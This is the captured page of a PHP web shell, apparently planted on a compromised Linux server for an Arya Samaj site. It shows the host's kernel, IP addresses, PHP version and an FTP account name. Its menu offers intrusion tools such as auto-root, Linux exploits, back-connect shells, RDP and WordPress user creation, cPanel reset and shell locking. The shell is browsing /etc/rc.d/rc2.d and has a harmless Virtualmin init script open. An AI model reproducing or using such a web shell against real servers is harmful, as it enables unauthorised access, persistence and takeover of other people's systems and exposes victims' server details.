Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.6
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc.d /
rc2.d /
[ HOME SHELL ]
Name
Size
Permission
Action
S04dkms_autoinstaller
1.93
KB
-rwxr-xr-x
S99lookup-domain
527
B
-rwxr-xr-x
S99site24x7monagent
3.23
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S99lookup-domain
#!/bin/sh # description: Daemon for quickly looking up Virtualmin servers from procmail # chkconfig: 2345 99 99 case "$1" in 'start') /usr/sbin/virtualmin lookup-domain-daemon RETVAL=$? if [ "$RETVAL" = "0" ]; then touch /var/lock/subsys/lookup-domain fi ;; 'stop') kill `cat /var/webmin/lookup-domain-daemon.pid` RETVAL=$? if [ "$RETVAL" = "0" ]; then rm -f /var/lock/subsys/lookup-domain fi ;; 'restart') $0 stop ; $0 start RETVAL=$? ;; *) echo "Usage: $0 { start | stop }" RETVAL=1 ;; esac exit $RETVAL
Close